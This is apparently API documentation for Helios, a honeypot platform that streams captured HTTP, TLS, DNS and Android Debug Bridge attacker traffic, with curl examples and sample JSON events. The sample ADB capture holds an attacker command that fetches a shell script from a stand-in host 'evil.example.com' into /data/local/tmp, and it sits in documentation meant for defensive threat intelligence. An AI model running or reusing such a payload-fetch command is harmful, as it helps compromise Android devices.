Helios

Helios is the Synthient honeypot platform. A globally distributed mesh of decoy HTTP, TLS, DNS, and Android Debug Bridge endpoints sits behind residential, datacenter, and mobile egress points, capturing every request, ClientHello, hostname lookup, and shell command attackers send. Every observation flows into the same lookup, feed, and streaming surfaces that power the rest of Synthient.

What Helios captures

Each event carries a meta block identifying the upstream proxy network pool_id, provider, proxy_ip, and the impersonated server so you can attribute attacker traffic back to the exit it traversed.

Access surfaces

Helios data is available three ways depending on your latency and volume needs:

Authentication & scopes

All Helios endpoints are served from https://api.synthient.com under /api/v4 and require your API key in the x-api-key header.

Each sensor exposes two scopes one for the parquet exports and one for the real-time stream:

See Authentication for full key handling and Errors for the 401/403 responses you'll see if a scope is missing.

Domain intelligence

The fastest way to put Helios to work is the domain lookup. It returns aggregate stats, a time series, top subdomains and ports, and the most recent raw events seen against the queried domain built from the same captures the streams below emit.

curl -G https://api.synthient.com/api/v4/lookup/domain/example.com \
  -H "x-api-key: $API_KEY"

Full request, response, and code samples live on the IP API page.

Common response codes

Stream HTTP captures

Real-time stream of HTTP request captures from Helios sensors, including method, URI, headers, and the raw request bytes.

curl -N https://api.synthient.com/api/v4/feeds/helio/http/stream \
  -H "x-api-key: $API_KEY"

{"timestamp":1778200137487,"tunnel_id":961793813,"domain":"ip-api.com","port":80,"protocol":"http","meta":{"proxy_ip":"195.63.23.169","server":"s1860.novel-layer.com:6000","pool_id":"flixview_gms","provider":"popa"},"details":{"method":"GET","uri":"/json/?fields=61439","version":"HTTP/1.1","headers":{"User-Agent":"axios/1.16.0","Host":"ip-api.com"}},"raw":"GET /json/?fields=61439 HTTP/1.1\r\nHost: ip-api.com\r\n…"}

Stream TLS captures

Real-time stream of TLS ClientHello captures from Helios sensors. The details block carries the fully parsed handshake record/handshake versions, the client random and session ID, the full cipher-suite and extension lists with their numeric codes, supported groups, signature algorithms, key-share groups, PSK key-exchange modes, and the boolean handshake flags (extended_master_secret, renegotiation_info, status_request, signed_certificate_timestamps, has_grease, etc.).

curl -N https://api.synthient.com/api/v4/feeds/helio/https/stream \
  -H "x-api-key: $API_KEY"

{
  "timestamp": 1778200008794,
  "tunnel_id": 740057945,
  "domain": "www.youtube.com",
  "port": 443,
  "protocol": "https",
  "meta": {
    "proxy_ip": "217.181.88.34",
    "server": "s1863.novel-layer.com:6000",
    "pool_id": "flixview_gms",
    "provider": "popa"
  },
  "details": {
    "record_version": "TLS 1.2",
    "handshake_version": "TLS 1.2",
    "client_random": "9fdd003157d728fcae103ccc0f849396ed67784ed71c557cbaa1ae9abe39aea5",
    "session_id_length": 32,
    "session_id": "4cfe7bb506b4e8593d96fbf1d66bf70cf1a46c39c7e2fe55672c3cf9689e10f6",
    "cipher_suites": [
      { "code": 4865, "name": "TLS_AES_128_GCM_SHA256" },
      { "code": 4866, "name": "TLS_AES_256_GCM_SHA384" }
      // ... rest of the cipher suites
    ],
    "sni": "www.youtube.com",
    "supported_versions": ["TLS 1.3", "TLS 1.2"],
    "extensions": [
      { "code": 0, "name": "server_name", "length": 20 },
      { "code": 43, "name": "supported_versions", "length": 9 }
      // ... rest of the extensions
    ],
    "extended_master_secret": true,
    "renegotiation_info": true,
    "status_request": true,
    "has_grease": false
    // ... rest of the parsed ClientHello
  },
  "raw": null
}

Stream DNS captures

Real-time stream of resolution observations from Helios honeypot tunnels every hostname an inbound flow is destined for, alongside the destination port. Useful for catching the early "where is the C2?" stage of an attacker session and for surfacing fast-flux infrastructure.

curl -N https://api.synthient.com/api/v4/feeds/helio/dns/stream \
  -H "x-api-key: $API_KEY"

{"timestamp":1762605697,"tunnel_id":42,"domain":"c2.example.com","port":443,"meta":{"proxy_ip":"203.0.113.42","server":"hp-04","pool_id":"pool-us-east","provider":"BRIGHTDATA"}}

Stream ADB captures

Real-time stream of Android Debug Bridge shell commands captured by Helios sensors. The command field is the raw shell command bytes serialized as a JSON string use the SHA-256 hash to deduplicate identical commands across sessions.

curl -N https://api.synthient.com/api/v4/feeds/helio/adb/stream \
  -H "x-api-key: $API_KEY"

{"session":"a1b2c3d4…","sequential_id":918274,"command":"cd /data/local/tmp; wget http://evil.example.com/bin.sh","hash":"7e8f…"}

Consuming Helios streams

Helios uses the same NDJSON server-streaming pattern as the rest of the Firehose. Connections stay open up to 30 minutes; reconnect immediately on clean close, and back off with jitter on errors. Full Python, TypeScript, and Go consumers are on the Firehose page swap the URL for the Helios stream you want.

Bulk exports

For retrospective analysis, every Helios sensor publishes daily and hourly parquet snapshots through the standard Feeds endpoints under the honeypot_http, honeypot_https, honeypot_dns, and honeypot_adb stream identifiers.

curl -G https://api.synthient.com/api/v4/feeds/helio/http/export \
  -H "x-api-key: $API_KEY"

Next steps

• IP API domain lookup per-domain Helios intelligence.
• Feeds daily/hourly parquet snapshots of every Helios sensor.
• Firehose full NDJSON consumer reference and proxy/anonymizer/fingerprint streams.